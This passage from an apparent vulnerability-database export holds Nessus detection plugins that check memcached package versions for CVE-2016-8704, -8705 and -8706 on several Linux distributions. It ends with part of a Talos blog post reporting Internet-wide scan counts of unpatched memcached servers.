flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:19:28", "description": "An integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the memcached binary protocol. An attacker could create a\nspecially crafted message that would cause the memcached server to\ncrash or, potentially, execute arbitrary code. (CVE-2016-8704 ,\nCVE-2016-8705)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in memcached's parsing of SASL authentication messages. An\nattacker could create a specially crafted message that would cause the\nmemcached server to crash or, potentially, execute arbitrary code.\n(CVE-2016-8706)", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-11T00:00:00", "title": "Amazon Linux AMI : memcached (ALAS-2016-761)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:memcached-debuginfo", "p-cpe:/a:amazon:linux:memcached-devel", "p-cpe:/a:amazon:linux:memcached", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-761.NASL", "href": "https://www.tenable.com/plugins/nessus/94681", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-761.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94681);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"ALAS\", value:\"2016-761\");\n\n script_name(english:\"Amazon Linux AMI : memcached (ALAS-2016-761)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the memcached binary protocol. An attacker could create a\nspecially crafted message that would cause the memcached server to\ncrash or, potentially, execute arbitrary code. (CVE-2016-8704 ,\nCVE-2016-8705)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in memcached's parsing of SASL authentication messages. An\nattacker could create a specially crafted message that would cause the\nmemcached server to crash or, potentially, execute arbitrary code.\n(CVE-2016-8706)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-761.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update memcached' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:memcached-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:memcached-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"memcached-1.4.15-9.13.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"memcached-debuginfo-1.4.15-9.13.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"memcached-devel-1.4.15-9.13.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached / memcached-debuginfo / memcached-devel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:44:07", "description": "Aleksandar Nikolic discovered that Memcached incorrectly handled\ncertain malformed commands. A remote attacker could use this issue to\ncause Memcached to crash, resulting in a denial of service, or\npossibly execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-03T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : memcached vulnerabilities (USN-3120-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:memcached", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:16.10", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3120-1.NASL", "href": "https://www.tenable.com/plugins/nessus/94509", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3120-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94509);\n script_version(\"2.5\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"USN\", value:\"3120-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : memcached vulnerabilities (USN-3120-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Aleksandar Nikolic discovered that Memcached incorrectly handled\ncertain malformed commands. A remote attacker could use this issue to\ncause Memcached to crash, resulting in a denial of service, or\npossibly execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3120-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected memcached package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"memcached\", pkgver:\"1.4.13-0ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"memcached\", pkgver:\"1.4.14-0ubuntu9.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"memcached\", pkgver:\"1.4.25-2ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"memcached\", pkgver:\"1.4.25-2ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T08:51:48", "description": "According to the versions of the memcached package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Two integer overflow flaws, leading to heap-based\n buffer overflows, were found in the memcached binary\n protocol. An attacker could create a specially crafted\n message that would cause the memcached server to crash\n or, potentially, execute arbitrary code.\n (CVE-2016-8704, CVE-2016-8705)\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in memcached's parsing of\n SASL authentication messages. An attacker could create\n a specially crafted message that would cause the\n memcached server to crash or, potentially, execute\n arbitrary code.(CVE-2016-8706)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : memcached (EulerOS-SA-2016-1086)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2017-05-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:memcached", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2016-1086.NASL", "href": "https://www.tenable.com/plugins/nessus/99845", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99845);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-8704\",\n \"CVE-2016-8705\",\n \"CVE-2016-8706\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : memcached (EulerOS-SA-2016-1086)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the memcached package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Two integer overflow flaws, leading to heap-based\n buffer overflows, were found in the memcached binary\n protocol. An attacker could create a specially crafted\n message that would cause the memcached server to crash\n or, potentially, execute arbitrary code.\n (CVE-2016-8704, CVE-2016-8705)\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in memcached's parsing of\n SASL authentication messages. An attacker could create\n a specially crafted message that would cause the\n memcached server to crash or, potentially, execute\n arbitrary code.(CVE-2016-8706)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1086\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ed837d0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected memcached packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"memcached-1.4.15-9.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:14:20", "description": "Security fix for CVE-2016-8704, CVE-2016-8705, CVE-2016-8706\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-15T00:00:00", "title": "Fedora 24 : memcached (2016-66c70cadb4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-11-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:memcached", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-66C70CADB4.NASL", "href": "https://www.tenable.com/plugins/nessus/94814", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-66c70cadb4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94814);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"FEDORA\", value:\"2016-66c70cadb4\");\n\n script_name(english:\"Fedora 24 : memcached (2016-66c70cadb4)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-8704, CVE-2016-8705, CVE-2016-8706\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-66c70cadb4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected memcached package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"memcached-1.4.25-2.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2017-07-29T13:22:40", "bulletinFamily": "blog", "cvelist": ["CVE-2016-8704", "CVE-2016-8706"], "description": "<i>This blog authored by Aleksandar Nikolich and <a href=\"https://twitter.com/dave_maynor\">David Maynor</a> with contributions from Nick Biasini</i><br /><br /><h2 id=\"h.td0sd1w6neqn\">Memcached - Not secure, Not Patched Fast Enough</h2><h2 id=\"h.td0sd1w6neqn\"> </h2>Recently high profile vulnerabilities in systems were used to unleash several global ransomware attacks that greatly impacted organizations. These types of vulnerabilities were previously patched and could have been addressed by organizations before the attacks commenced. This is just the latest example in a long line of threats that are successful in large part because of the inability for patches to be applied in a timely and effective manner. In late 2016 Talos disclosed a series of <a href=\"http://blog.talosintelligence.com/2016/10/memcached-vulnerabilities.html\">vulnerabilities</a> in a software platform called Memcached. After releasing the vulnerabilities Talos has been monitoring the amount of systems that were vulnerable as well as the rate at which they have been patched. This blog will give a quick overview of the vulnerabilities and discuss the unfortunate findings of the Internet wide scans that we have been conducting over the last six months.<br /><a name='more'></a><br /><h3 id=\"h.q2uv63tp0nfw\">What is Memcached?</h3><br />Memcached is a high performance object caching server intended for speeding up dynamic web applications and is used by some of the most popular Internet websites. It has two versions of the protocol for storing and retrieving arbitrary data, an ASCII based one and a binary one. The binary protocol is optimized for size.<br /><br />It's intended use is to be accessed by the web application servers and should never under any circumstances be exposed to an untrusted environment. Newer versions of the server include basic authentication support based on SASL which, based on our findings, is seldom used.<br /><h3 id=\"h.16cz4o7xq5rp\">Audit and Vulnerabilities</h3><br />In October last year, we performed a source code audit of Memcached server and identified three distinct but similar vulnerabilities. All three are in the implementation of the binary protocol. Two vulnerabilities lie in the part of the code dealing with adding and updating cached objects, while the third is in the aforementioned SASL authentication mechanism. All three vulnerabilities are due to integer overflows leading to controlled heap buffer overflows and due to the nature of the protocol can be abused for sensitive memory disclosure which can lead to straightforward and reliable exploitation.<br /><br />The vendor was notified and promptly issued a patch that we have verified as sufficient. Public release of the new patched version was on October 31st. The CVE ID assigned to this vulnerability is CVE-2016-8704 and was tracked by us as TALOS-2016-0219. Quickly after the public release, major linux distributions issued updates and advisories of their own. One key thing to note is that major distributions (Ubuntu, Fedora...) backported patches without bumping up the version number of the server. References:<br /><br /><ul><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2016-0219/\">http://www.talosintelligence.com/reports/TALOS-2016-0219/</a></li><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2016-0220/\">http://www.talosintelligence.com/reports/TALOS-2016-0220/</a></li><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2016-0221/\">http://www.talosintelligence.com/reports/TALOS-2016-0221/</a></li><li><a href=\"https://access.redhat.com/security/cve/cve-2016-8704\">https://access.redhat.com/security/cve/cve-2016-8704</a></li><li><a href=\"https://www.ubuntu.com/usn/usn-3120-1/\">https://www.ubuntu.com/usn/usn-3120-1/</a></li></ul><h3 id=\"h.5mbd0jynb1ov\">MongoDB attacks of January 2017</h3><br />A slight detour. Sometime in late December/early January news of a widespread attack on MongoDB servers surfaced.<br /><br />MongoDB is a memory resident, NoSQL database. Similarly to memcached, it is never supposed to be exposed to untrusted environment, which is often overlooked by developers, and sometimes production servers end up being freely accessible over Internet.<br /><br />It is a well known fact that many thousands of MongoDB servers are exposed over the Internet, but some criminal groups decided to weaponize this fact, aided by the lack of any form of authentication or access control, for profit. In a matter of days, thousands of these accessible MongoDB hosts were hit with a ransomware attack.<br /><br />Essentially, the bad guys connected to the server, siphoned all the data off of it and left a note requesting certain amount of bitcoins as ransom for the data. Soon, it became apparent that multiple competing groups were attacking the same servers which leads to the conclusion that there is no hope of actually recovering data, if there ever was in the first place.<br /><br />These attacks had a widespread media coverage which certainly led to higher awareness of this issue, and hopefully to less servers being exposed.<br /><h3 id=\"h.4p7rn2oe4z76\">Could Memcached face a similar fate?</h3><br />This whole MongoDB kerfuffle made us think about what the impact would be on a similar attack on memcached. Granted, memcached, unlike MongoDB, isn't a database, but can still contain sensitive information and disruption in the service availability would certainly lead to further disruptions on dependent services. Additionally, we could assess the potential attack surface for vulnerabilities that we found as well as see how widely the patch is applied.<br /><br />So we decided to scan the Internet and see...<br /><h3 id=\"h.6hbm56sxg6y7\">Scans</h3><br />In order to properly get the data we needed, a special scan had to be performed. We wanted a couple of data points:<br /><br /><ul><li>how many servers are directly accessible over internet</li><li>how many of those are still vulnerable</li><li>how many use authentication</li><li>how many of servers with authentication enabled are still vulnerable</li></ul><br />We couldn't rely on the version reported by the server because, as mentioned before, many distributions backport security patches so the version string doesn't always reflect the patch level. Because of that, we devised a special test which would send a single packet to the server and could tell from the reply if the server was vulnerable or not.<br /><br />First series of scans was conducted in late February. This first dataset lead to another scan for authentication-enabled servers specifically which was done in early March.<br /><h3 id=\"h.s569bgq4qc8g\">Results Of The Scans</h3><br />Gathering all the data revealed mostly expected results. More than a 100,000 accessible servers, with almost 80% still vulnerable and only about 22% having authentication enabled. Interestingly, almost all servers with authentication enabled were still found to be vulnerable to CVE-2016-8706 which we specifically tested for. The exact numbers are as follows:<br /><br /><ul><li>Total servers with valid responses: 107786</li><li>Total servers still vulnerable: 85121 (~79%)</li><li>Total servers not vulnerable: 22665 (~21%)</li><li>Total servers requiring authentication: 23907 (~22%)</li><li>Total vulnerable servers requiring authentication: 23707 (~99%)</li></ul><br />Breakdown of numbers by country is, again, as expected:<br /><ol></ol><b>All servers</b><br /><ol></ol><ol><li>36937 - United States</li><li>18878 - China </li><li>5452 - United Kingdom</li><li>5314 - France</li><li>3901 - Russia</li><li>3698 - Germany</li><li>3607 - Japan</li><li>3464 - India</li><li>3287 - Netherlands</li><li>2443 - Canada</li></ol><ol></ol><b>Vulnerable servers</b><br /><ol></ol><ol><li>29660 - United States</li><li>16917 - China</li><li>4713 - United Kingdom</li><li>3209 - France</li><li>3047 - Germany</li><li>3003 - Japan</li><li>2556 - Netherlands</li><li>2460 - India</li><li>2266 - Russia</li><li>1820 - Hong Kong</li></ol><br />There are a couple of conclusions that can be drawn from this. First, there is a large number of easily 